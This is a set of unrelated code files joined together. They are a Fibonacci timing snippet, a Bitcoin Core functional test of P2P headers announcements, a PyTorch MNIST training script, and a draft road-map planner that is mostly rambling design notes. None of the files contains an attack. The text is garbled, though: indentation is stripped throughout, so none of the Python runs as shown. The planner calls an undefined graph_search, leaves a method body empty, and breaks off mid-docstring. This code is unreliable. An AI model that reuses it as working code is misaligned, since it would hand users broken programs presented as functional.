    # time.clock() was removed in Python 3.8; use time.perf_counter() instead.
    startI = time.perf_counter()
    resultI = getFibonacciIterative(n)
    endI = time.perf_counter()
    startR = time.perf_counter()
    resultR = getFibonacciRecursive(n)
    endR = time.perf_counter()
s = "{} calculting {} => {} in {} seconds"
print(s.format(
"Iteratively", n, resultI, endI - startI
))
print(s.format(
"Recursively", n, resultR, endR - startR
))
# Or we can use the following
nterms = int(input("How many terms? "))
# first two terms
n1, n2 = 0, 1
count = 0
# check if the number of terms is valid
if nterms <= 0:
print("Please enter a positive integer")
elif nterms == 1:
print("Fibonacci sequence upto",nterms,":")
print(n1)
else:
print("Fibonacci sequence:")
while count < nterms:
print(n1)
nth = n1 + n2
# update values
n1 = n2
n2 = nth
count += 1
print("End of code.")
|
the-stack_106_22078
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test behavior of headers messages to announce blocks.
Setup:
- Two nodes:
- node0 is the node-under-test. We create two p2p connections to it. The
first p2p connection is a control and should only ever receive inv's. The
second p2p connection tests the headers sending logic.
- node1 is used to create reorgs.
test_null_locators
==================
Sends two getheaders requests with null locator values. First request's hashstop
value refers to a validated block, while second request's hashstop value refers to
a block which hasn't been validated. Verifies only the first request returns
headers.
test_nonnull_locators
=====================
Part 1: No headers announcements before "sendheaders"
a. node mines a block [expect: inv]
send getdata for the block [expect: block]
b. node mines another block [expect: inv]
send getheaders and getdata [expect: headers, then block]
c. node mines another block [expect: inv]
peer mines a block, announces with header [expect: getdata]
d. node mines another block [expect: inv]
Part 2: After "sendheaders", headers announcements should generally work.
a. peer sends sendheaders [expect: no response]
peer sends getheaders with current tip [expect: no response]
b. node mines a block [expect: tip header]
c. for N in 1, ..., 10:
* for announce-type in {inv, header}
- peer mines N blocks, announces with announce-type
[ expect: getheaders/getdata or getdata, deliver block(s) ]
- node mines a block [ expect: 1 header ]
Part 3: Headers announcements stop after large reorg and resume after getheaders or inv from peer.
- For response-type in {inv, getheaders}
* node mines a 7 block reorg [ expect: headers announcement of 8 blocks ]
* node mines an 8-block reorg [ expect: inv at tip ]
* peer responds with getblocks/getdata [expect: inv, blocks ]
* node mines another block [ expect: inv at tip, peer sends getdata, expect: block ]
* node mines another block at tip [ expect: inv ]
* peer responds with getheaders with an old hashstop more than 8 blocks back [expect: headers]
* peer requests block [ expect: block ]
* node mines another block at tip [ expect: inv, peer sends getdata, expect: block ]
* peer sends response-type [expect headers if getheaders, getheaders/getdata if mining new block]
* node mines 1 block [expect: 1 header, peer responds with getdata]
Part 4: Test direct fetch behavior
a. Announce 2 old block headers.
Expect: no getdata requests.
b. Announce 3 new blocks via 1 headers message.
Expect: one getdata request for all 3 blocks.
(Send blocks.)
c. Announce 1 header that forks off the last two blocks.
Expect: no response.
d. Announce 1 more header that builds on that fork.
Expect: one getdata request for two blocks.
e. Announce 16 more headers that build on that fork.
Expect: getdata request for 14 more blocks.
f. Announce 1 more header that builds on that fork.
Expect: no response.
Part 5: Test handling of headers that don't connect.
a. Repeat 10 times:
1. Announce a header that doesn't connect.
Expect: getheaders message
2. Send headers chain.
Expect: getdata for the missing blocks, tip update.
b. Then send 9 more headers that don't connect.
Expect: getheaders message each time.
c. Announce a header that does connect.
Expect: no response.
d. Announce 49 headers that don't connect.
Expect: getheaders message each time.
e. Announce one more that doesn't connect.
Expect: disconnect.
"""
from test_framework.blocktools import create_block, create_coinbase
from test_framework.messages import CInv
from test_framework.mininode import (
CBlockHeader,
NODE_WITNESS,
P2PInterface,
mininode_lock,
msg_block,
msg_getblocks,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_sendheaders,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
sync_blocks,
wait_until,
)
DIRECT_FETCH_RESPONSE_TIME = 0.05
class BaseNode(P2PInterface):
def __init__(self):
super().__init__()
self.block_announced = False
self.last_blockhash_announced = None
self.recent_headers_announced = []
def send_get_data(self, block_hashes):
"""Request data for a list of block hashes."""
msg = msg_getdata()
for x in block_hashes:
msg.inv.append(CInv(2, x))
self.send_message(msg)
def send_get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.send_message(msg)
def send_block_inv(self, blockhash):
msg = msg_inv()
msg.inv = [CInv(2, blockhash)]
self.send_message(msg)
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
def send_getblocks(self, locator):
getblocks_message = msg_getblocks()
getblocks_message.locator.vHave = locator
self.send_message(getblocks_message)
def wait_for_getdata(self, hash_list, timeout=60):
if hash_list == []:
return
test_function = lambda: "getdata" in self.last_message and [x.hash for x in self.last_message["getdata"].inv] == hash_list
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block_announcement(self, block_hash, timeout=60):
test_function = lambda: self.last_blockhash_announced == block_hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def on_inv(self, message):
self.block_announced = True
self.last_blockhash_announced = message.inv[-1].hash
def on_headers(self, message):
if len(message.headers):
self.block_announced = True
for x in message.headers:
x.calc_sha256()
# append because headers may be announced over multiple messages.
self.recent_headers_announced.append(x.sha256)
self.last_blockhash_announced = message.headers[-1].sha256
def clear_block_announcements(self):
with mininode_lock:
self.block_announced = False
self.last_message.pop("inv", None)
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_headers_announcement(self, headers):
"""Test whether the last headers announcements received are right.
Headers may be announced across more than one message."""
test_function = lambda: (len(self.recent_headers_announced) >= len(headers))
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
assert_equal(self.recent_headers_announced, headers)
self.block_announced = False
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_inv_announcement(self, inv):
"""Test whether the last announcement received had the right inv.
inv should be a list of block hashes."""
test_function = lambda: self.block_announced
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
compare_inv = []
if "inv" in self.last_message:
compare_inv = [x.hash for x in self.last_message["inv"].inv]
assert_equal(compare_inv, inv)
self.block_announced = False
self.last_message.pop("inv", None)
class SendHeadersTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def mine_blocks(self, count):
"""Mine count blocks and return the new tip."""
# Clear out block announcements from each p2p listener
[x.clear_block_announcements() for x in self.nodes[0].p2ps]
self.nodes[0].generatetoaddress(count, self.nodes[0].get_deterministic_priv_key().address)
return int(self.nodes[0].getbestblockhash(), 16)
def mine_reorg(self, length):
"""Mine a reorg that invalidates length blocks (replacing them with # length+1 blocks).
Note: we clear the state of our p2p connections after the
to-be-reorged-out blocks are mined, so that we don't break later tests.
return the list of block hashes newly mined."""
# make sure all invalidated blocks are node0's
self.nodes[0].generatetoaddress(length, self.nodes[0].get_deterministic_priv_key().address)
sync_blocks(self.nodes, wait=0.1)
for x in self.nodes[0].p2ps:
x.wait_for_block_announcement(int(self.nodes[0].getbestblockhash(), 16))
x.clear_block_announcements()
tip_height = self.nodes[1].getblockcount()
hash_to_invalidate = self.nodes[1].getblockhash(tip_height - (length - 1))
self.nodes[1].invalidateblock(hash_to_invalidate)
all_hashes = self.nodes[1].generatetoaddress(length + 1, self.nodes[1].get_deterministic_priv_key().address) # Must be longer than the orig chain
sync_blocks(self.nodes, wait=0.1)
return [int(x, 16) for x in all_hashes]
def run_test(self):
# Setup the p2p connections
inv_node = self.nodes[0].add_p2p_connection(BaseNode())
# Make sure NODE_NETWORK is not set for test_node, so no block download
# will occur outside of direct fetching
test_node = self.nodes[0].add_p2p_connection(BaseNode(), services=NODE_WITNESS)
# Ensure verack's have been processed by our peer
inv_node.sync_with_ping()
test_node.sync_with_ping()
self.test_null_locators(test_node, inv_node)
self.test_nonnull_locators(test_node, inv_node)
def test_null_locators(self, test_node, inv_node):
tip = self.nodes[0].getblockheader(self.nodes[0].generatetoaddress(1, self.nodes[0].get_deterministic_priv_key().address)[0])
tip_hash = int(tip["hash"], 16)
inv_node.check_last_inv_announcement(inv=[tip_hash])
test_node.check_last_inv_announcement(inv=[tip_hash])
self.log.info("Verify getheaders with null locator and valid hashstop returns headers.")
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=tip_hash)
test_node.check_last_headers_announcement(headers=[tip_hash])
self.log.info("Verify getheaders with null locator and invalid hashstop does not return headers.")
block = create_block(int(tip["hash"], 16), create_coinbase(tip["height"] + 1), tip["mediantime"] + 1)
block.nVersion = 0x20000000
block.solve()
test_node.send_header_for_blocks([block])
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=int(block.hash, 16))
test_node.sync_with_ping()
assert_equal(test_node.block_announced, False)
inv_node.clear_block_announcements()
test_node.send_message(msg_block(block))
inv_node.check_last_inv_announcement(inv=[int(block.hash, 16)])
def test_nonnull_locators(self, test_node, inv_node):
tip = int(self.nodes[0].getbestblockhash(), 16)
# PART 1
# 1. Mine a block; expect inv announcements each time
self.log.info("Part 1: headers don't start before sendheaders message...")
for i in range(4):
self.log.debug("Part 1.{}: starting...".format(i))
old_tip = tip
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
# Try a few different responses; none should affect next announcement
if i == 0:
# first request the block
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# next try requesting header and block
test_node.send_get_headers(locator=[old_tip], hashstop=tip)
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
test_node.clear_block_announcements() # since we requested headers...
elif i == 2:
# this time announce own block via headers
inv_node.clear_block_announcements()
height = self.nodes[0].getblockcount()
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
new_block = create_block(tip, create_coinbase(height + 1), block_time)
new_block.nVersion = 0x20000000
new_block.solve()
test_node.send_header_for_blocks([new_block])
test_node.wait_for_getdata([new_block.sha256])
test_node.send_message(msg_block(new_block))
test_node.sync_with_ping() # make sure this block is processed
wait_until(lambda: inv_node.block_announced, timeout=60, lock=mininode_lock)
inv_node.clear_block_announcements()
test_node.clear_block_announcements()
self.log.info("Part 1: success!")
self.log.info("Part 2: announce blocks with headers after sendheaders message...")
# PART 2
# 2. Send a sendheaders message and test that headers announcements
# commence and keep working.
test_node.send_message(msg_sendheaders())
prev_tip = int(self.nodes[0].getbestblockhash(), 16)
test_node.send_get_headers(locator=[prev_tip], hashstop=0)
test_node.sync_with_ping()
# Now that we've synced headers, headers announcements should work
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height = self.nodes[0].getblockcount() + 1
block_time += 10 # Advance far enough ahead
for i in range(10):
self.log.debug("Part 2.{}: starting...".format(i))
# Mine i blocks, and alternate announcing either via
# inv (of tip) or via headers. After each, new blocks
# mined by the node should successfully be announced
# with block header, even though the blocks are never requested
for j in range(2):
self.log.debug("Part 2.{}.{}: starting...".format(i, j))
blocks = []
for b in range(i + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
if j == 0:
# Announce via inv
test_node.send_block_inv(tip)
test_node.wait_for_getheaders()
# Should have received a getheaders now
test_node.send_header_for_blocks(blocks)
# Test that duplicate inv's won't result in duplicate
# getdata requests, or duplicate headers announcements
[inv_node.send_block_inv(x.sha256) for x in blocks]
test_node.wait_for_getdata([x.sha256 for x in blocks])
inv_node.sync_with_ping()
else:
# Announce via headers
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
# Test that duplicate headers won't result in duplicate
# getdata requests (the check is further down)
inv_node.send_header_for_blocks(blocks)
inv_node.sync_with_ping()
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
inv_node.sync_with_ping()
# This block should not be announced to the inv node (since it also
# broadcast it)
assert "inv" not in inv_node.last_message
assert "headers" not in inv_node.last_message
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height += 1
block_time += 1
self.log.info("Part 2: success!")
self.log.info("Part 3: headers announcements can stop after large reorg, and resume after headers/inv from peer...")
# PART 3. Headers announcements can stop after large reorg, and resume after
# getheaders or inv from peer.
for j in range(2):
self.log.debug("Part 3.{}: starting...".format(j))
# First try mining a reorg that can propagate with header announcement
new_block_hashes = self.mine_reorg(length=7)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=new_block_hashes)
block_time += 8
# Mine a too-large reorg, which should be announced with a single inv
new_block_hashes = self.mine_reorg(length=8)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
block_time += 9
fork_point = self.nodes[0].getblock("%064x" % new_block_hashes[0])["previousblockhash"]
fork_point = int(fork_point, 16)
# Use getblocks/getdata
test_node.send_getblocks(locator=[fork_point])
test_node.check_last_inv_announcement(inv=new_block_hashes)
test_node.send_get_data(new_block_hashes)
test_node.wait_for_block(new_block_hashes[-1])
for i in range(3):
self.log.debug("Part 3.{}.{}: starting...".format(j, i))
# Mine another block, still should get only an inv
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
if i == 0:
# Just get the data -- shouldn't cause headers announcements to resume
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# Send a getheaders message that shouldn't trigger headers announcements
# to resume (best header sent will be too old)
test_node.send_get_headers(locator=[fork_point], hashstop=new_block_hashes[1])
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 2:
# This time, try sending either a getheaders to trigger resumption
# of headers announcements, or mine a new block and inv it, also
# triggering resumption of headers announcements.
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
if j == 0:
test_node.send_get_headers(locator=[tip], hashstop=0)
test_node.sync_with_ping()
else:
test_node.send_block_inv(tip)
test_node.sync_with_ping()
# New blocks should now be announced with header
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
self.log.info("Part 3: success!")
self.log.info("Part 4: Testing direct fetch behavior...")
tip = self.mine_blocks(1)
height = self.nodes[0].getblockcount() + 1
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
# Create 2 blocks. Send the blocks, then send the headers.
blocks = []
for b in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
inv_node.send_message(msg_block(blocks[-1]))
inv_node.sync_with_ping() # Make sure blocks are processed
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
# should not have received any getdata messages
with mininode_lock:
assert "getdata" not in test_node.last_message
# This time, direct fetch should work
blocks = []
for b in range(3):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=DIRECT_FETCH_RESPONSE_TIME)
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
# Now announce a header that forks the last two blocks
tip = blocks[0].sha256
height -= 2
blocks = []
# Create extra blocks for later
for b in range(20):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Announcing one block on fork should not trigger direct fetch
# (less work than tip)
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[0:1])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
# Announcing one more block on fork should trigger direct fetch for
# both blocks (same work as tip)
test_node.send_header_for_blocks(blocks[1:2])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[0:2]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 16 more headers should trigger direct fetch for 14 more
# blocks
test_node.send_header_for_blocks(blocks[2:18])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[2:16]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 1 more header should not trigger any response
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[18:19])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
self.log.info("Part 4: success!")
# Now deliver all those blocks we announced.
[test_node.send_message(msg_block(x)) for x in blocks]
self.log.info("Part 5: Testing handling of unconnecting headers")
# First we test that receipt of an unconnecting header doesn't prevent
# chain sync.
for i in range(10):
self.log.debug("Part 5.{}: starting...".format(i))
test_node.last_message.pop("getdata", None)
blocks = []
# Create two more blocks.
for j in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Send the header of the second block -> this won't connect.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[1]])
test_node.wait_for_getheaders()
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
assert_equal(int(self.nodes[0].getbestblockhash(), 16), blocks[1].sha256)
blocks = []
# Now we test that if we repeatedly don't send connecting headers, we
# don't go into an infinite loop trying to get them to connect.
MAX_UNCONNECTING_HEADERS = 10
for j in range(MAX_UNCONNECTING_HEADERS + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
for i in range(1, MAX_UNCONNECTING_HEADERS):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i]])
test_node.wait_for_getheaders()
# Next header will connect, should re-set our count:
test_node.send_header_for_blocks([blocks[0]])
# Remove the first two entries (blocks[1] would connect):
blocks = blocks[2:]
# Now try to see how many unconnecting headers we can send
# before we get disconnected. Should be 5*MAX_UNCONNECTING_HEADERS
for i in range(5 * MAX_UNCONNECTING_HEADERS - 1):
# Send a header that doesn't connect, check that we get a getheaders.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[i % len(blocks)]])
test_node.wait_for_getheaders()
# Eventually this stops working.
test_node.send_header_for_blocks([blocks[-1]])
# Should get disconnected
test_node.wait_for_disconnect()
self.log.info("Part 5: success!")
# Finally, check that the inv node never received a getdata request,
# throughout the test
assert "getdata" not in inv_node.last_message
if __name__ == '__main__':
SendHeadersTest().main()
|
the-stack_106_22080
|
import torch
import torch.nn as nn
import numpy as np
from torchsummary import summary
from torchvision import datasets
import torchvision.transforms as transforms
import torch.nn.functional as F
from extract_layers import extract_layers
from visualize_net import nnVisual, NetVisual
from manim.utils.file_ops import open_file
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(784, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
#x = self.pool(F.relu(self.conv1(x)))
#x = self.pool(F.relu(self.conv2(x)))
#x = x.view(-1, 16 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return F.log_softmax(x, dim=1)
# number of subprocesses to use for data loading
num_workers = 0
# how many samples per batch to load
batch_size = 20
# convert data to torch.FloatTensor
transform = transforms.ToTensor()
# choose the training and test datasets
train_data = datasets.MNIST(root='data', train=True,
download=True, transform=transform)
test_data = datasets.MNIST(root='data', train=False,
download=True, transform=transform)
# prepare data loaders
train_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,
num_workers=num_workers)
# L
net = Net()
viz_net = NetVisual(net, [784], device=torch.device("cpu"))
viz = nnVisual(viz_net)
layers_dict = viz_net.layers_dict
#viz.render()
#open_file("./media/videos/1080p60/nnVisual.mp4")
## Specify loss and optimization functions
# specify loss function
criterion = nn.CrossEntropyLoss()
# specify optimizer
optimizer = torch.optim.SGD(net.parameters(), lr=0.01)
# number of epochs to train the model
n_epochs = 30 # suggest training between 20-50 epochs
net.train() # prep model for training
for epoch in range(n_epochs):
# monitor training loss
train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
# clear the gradients of all optimized variables
optimizer.zero_grad()
data_flat = torch.flatten(data, start_dim=1)
# forward pass: compute predicted outputs by passing inputs to the model
output = net(data_flat)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data_flat.size(0)
viz_net.update_layers_dict(data_flat)
# print training statistics
# calculate average loss over an epoch
train_loss = train_loss/len(train_loader.dataset)
print(net.parameters())
print(viz_net.layers_dict["Linear-0"]["weights"])
print('Epoch: {} \tTraining Loss: {:.6f}'.format(
epoch+1,
train_loss
))
|
the-stack_106_22081
|
import random
# Ok, I think what we have below is correct as pseudo-code.
# Next: test it with a simple environment and make it no-longer pseudo-code
# After that: make it into a persistent thing that I can make multiple calls to.
'''
A snag:
I need some way of figuring out whether a node has already been explored. Currently these nodes can be anything. Ideally they would be something hashable so I can put them in a set or a dictionary, or even just use them as edge coordinates without using the more cumbersome integer ids to stand in for them in the set of edges.
Options:
1. Follow through: make the nodes be hashable and just do this.
2. Make an additional function (which must be passed in) that returns a unique id that can be used... but this is basically just the hash function.
What I'm going to do for now:
Follow through, make everything be hashable (can go in a set, etc.) then revise if that becomes unfeasible later.
'''
'''
A few thoughts:
There are two components here:
One thing that grows this graph and another thing that tries to find a path through that graph from start to goal. Both need similar, but slightly different structures. The graph can be shared for all time (i.e. by multiple calls to plan for the same target configuration). The path finder is specific to the start and goal.
The basic idea is to grow the graph until you can find a path through it from the start to the goal that is "good enough." How do you know when to check if you have a path from start to goal? At the moment, it seems like you can do this every time you make a connection back to the graph. But there's a better thing here I think. If you keep track of what nodes are reachable from the current start, then you can only check once you hit a previously unreachable node. That's not bad.
'''
'''
Another issue (perhaps for later):
Also, how do I do the backward search that lets me avoid camera motion? Right now this is all forward.
'''
'''
Tangles:
What is the interface that I want to provide to the gentle user of this function for any reasonable version of this?
So first off, we need an env.
My idea from earlier this morning is that each component should provide get_state and set_state (which should return an observation) methods that allow us to jump around to different states and do backtracking, etc. The combined state is then a good thing to use as a node identifier.
My idea from later this evening was to impose some kind of structure on this whole thing and use the fact that we are always adding or removing bricks that correspond to some target. In that way, each state would basically be a bit-vector for whether or not a certain target node has a corresponding node in the scene, and then another bit vector if we want to allow non-target nodes to show up when an agent makes mistakes. This is nice because we have a nice distance metric to use here when planning (Hamming distance).
The problem with the first thing is that it makes it hard to use certain nice heuristics, like assembly via disassembly.
The problem with the second thing is it's more limited and doesn't have variables for things like camera motion. So out the window it goes maybe?
The problem with throwing it out is that this assembly via disassembly is probably pretty powerful, and without it, it will take a lot more work to make sure we don't move the camera too much.
The second problem with it though is that we now have to figure out a way to translate whatever our different state space is to this bit vector, which becomes something we either have to make as some super-generic component of the env (which doesn't really make sense, because the env can cover spaces that don't have a specific target) or make that conversion another thing the user has to specify. What are we to do?
So conceptually, it would be really nice to be able to use whatever configuration space we want, but doing so gets rid of some powerful heuristics.
So what else must the user provide? Honestly, it would be nice if the answer was "a start, a goal and not much else." But then I realize that I have these functions that I've been treating as arguments: neighbor_fn and check_edge_fn. These are two new things that must be supplied by the gentle user, and they are not trivial at all. In the case of the reassembly planner, the neighbor_fn is:
def neighbor_fn(env, state, target):
obs = env.set_state(state)
current_instances = get_instances_from_obs()
match(current_instances, target)
if misplaced_current_instances:
return remove_ops_for_misplaced_current_instances
elif unplaced_target_instances:
return add_ops_for_target_graph_neighbors
else:
return []
But here we find another tangle: if our state space is this convoluted thing we get directly from the environment, how do we know what the neighbors will be or what high-level actions we can reason about? I mean, yeah I guess we can just hard-code it, and make our gentle user specify it in whatever implements remove_ops_for_misplaced_current_instances. This gets back to the fact that somebody real, either us or the gentle user, is going to need to do some translating from goofy complicated state space output by the environment to clean precise hashable node that can be added to a python set or dictionary and tested for equality with other nodes.
What to do what to do?
Is there a different route to take? Looking further afield, we could go to the bit-vector approach, and make everything else (cameras) part of the transition space between nodes. The problem with this is that we'd then have to track this as we trace a path through high-level nodes.
What if we just tried to plan directly in the super-crazy-pants space? Skip the high-level/low-level thing and just do all planning in the low-level space. This seems pretty hard though. Maybe possible with crazy heuristics? I mean that's kind of what my last attempt was/is right? And that has been kind of a disaster. Why? There's still some business to clear up there about viewpoints and other things. What a mess.
Ok, so how can we make the high-level/low-level search work? And make it general enough to use for multiple action spaces? This thing really is about adding and removing nodes, so maybe we do the bit-vector thing with a... no no no. We need the camera in there too. So the neighbor function is going to return camera motions as well? Yikes. Is this where some heuristic comes in to compensate for the blow-up in graph degree? Guess so.
We're also going to need something that can get us from point a to point b using low-level actions. I guess we know how to do this, the last few attempts at this all do something similar, but the last few attempts have also been all this crazy specific mess. I guess this is kind of fine if it gets me there, BUT I thought cleaning up that mess was part of what this attempt was all about, and it's kind of disappointing to throw away generality again (or require the gentle user to implement so so much).
As a thought exercise, let's pull this together from the bottom up. At the lowest level, our action space is all the pixels in the screen plus a dozen or so extra levers.
From here we can consolidate all the pixels into a varying number of discrete regions that all do the same thing. This takes us from ~256x256 to probably a few hundred discrete snap points. A few hundred is still really big. We could reduce this still if we group those few hundred into a slightly smaller functionally equivalent class, where all the snaps that result in the same next pose get grouped together. This may help a little bit, but not as much as we need. Is this getting us anywhere?
One thought: we can make the low-level planner be another instantiation of the high-level planner. Fancy fancy. In this case, the check_edge function would do nothing because all the edges are already correctly connected to each other. Would be kinda cool if it worked.
Ok no more tangles.
'''
'''
High Level:
env: gym environment
nodes: states
edges: lazily evaluated low-level state-action-state paths
neighbor_fn: [manually specified] add-remove bricks plus camera actions
check_edge_fn: low-level planner
Low Level:
env: gym environment (shared with high-level)
nodes: states
edges: actions
neighbor_fn:
Yo wait wait wait... what if we added a new action space that lets us find high-level neighbors automatically based on the target. Yeah I like that a lot. This is only in the training environment, so the agent can't actually use it, but it can be used for supervision. We could even do this for the low-level environment too. The purpose of it is just to specify the structure of the graph for planning at that particular level. We could even make this some levels deeper by making the low-level planner operate in symbolic snap space and defer that plan to a low-low-level (basement-level) planner that picks out pixel coordinates and shit. Eew man, that's nasty. Maybe good nasty. Maybe bad nasty. Won't know until the morning.
How does all this make the planning more general and easy to use?
Oh one more thing, if we do the center-viewport-to-snap thing I've been mulling over in my head, then the number of camera actions are really big yo. This is kind of similar to the issues I'm having with everything else though. It seems like I need a special heuristic kind of thing to tell me which ones of these to consider.
'''
'''
There is another argument to make here: just forget all this fancy general nonsense and make one thing that works for reassembly. Oof. Just fuggin do it, you know? Is this the right thing? Don't mull it over. Lay it out. Let's start laying this out, enough meandering.
'''
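# Illustrative sketch (added; not part of the original notes): one way to get the
# hashable node identifiers discussed above for the reassembly case is a frozenset
# of placed (brick, pose) pairs. All names here are hypothetical placeholders.
def make_reassembly_state(placed_bricks):
    # placed_bricks: iterable of (brick_id, discretized_pose) tuples
    return frozenset(placed_bricks)

def reassembly_neighbor_fn_sketch(state, target_state):
    # Remove any misplaced brick first, otherwise propose adding a missing one.
    misplaced = state - target_state
    if misplaced:
        return [state - {brick} for brick in misplaced]
    missing = target_state - state
    return [state | {brick} for brick in missing]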
class GraphSearch:
def __init__(self, road_map):
self.road_map = road_map
class RoadMap:
def __init__(
self,
env,
neighbor_fn,
check_edge_fn,
):
self.env = env
self.nodes = set()
self.edges = {}
# TODO: make these members, and make the user subclass RoadMap?
self.neighbor_fn = neighbor_fn
self.check_edge_fn = check_edge_fn
def plan(self, start, goal, max_cost=float('inf')):
while True:
path, cost = self.graph_search(start, goal, max_cost=max_cost)
if path is not None:
return path, cost
new_nodes = self.expand_graph()
if not new_nodes:
raise Exception
    def graph_search(self, start, goal, max_cost=float('inf')):
precursors = {}
frontier = [(0,start)]
def plan(
env,
start,
goal,
neighbor_fn,
check_edge_fn,
max_cost=float('inf'),
):
nodes = {goal}
edges = {}
# initialize the frontier
frontier = [(None, start)]
reachable_nodes = {start}
def pick_from_frontier():
connected_edges = [
(a,b) for (a,b) in frontier if b in nodes]
if connected_edges:
            return random.choice(connected_edges)
else:
return random.choice(frontier)
while frontier:
source, destination = pick_from_frontier()
nodes.add(destination)
if source is not None:
edges[source, destination] = float('inf'), None
if destination not in reachable_nodes:
path_steps = []
path_cost = 0.
# this should be an in-place A* update or something
path = graph_search(start, goal, nodes, edges)
            for s, d in path:
                edge_cost, edge_steps = edges[s, d]
                if edge_steps is None:
                    edge_cost, edge_steps = check_edge_fn(env, s, d)
                    edges[s, d] = edge_cost, edge_steps
                path_steps.extend(edge_steps)
                path_cost += edge_cost
if path_cost >= max_cost:
break
reachable_nodes.add(d)
else:
return path_steps, path_cost
        neighbors = neighbor_fn(env, destination)
        for neighbor in neighbors:
            frontier.append((destination, neighbor))
# if we can't find anything, return an empty sequence with infinite cost
return [], float('inf')
def test_plan():
'''
d
x \
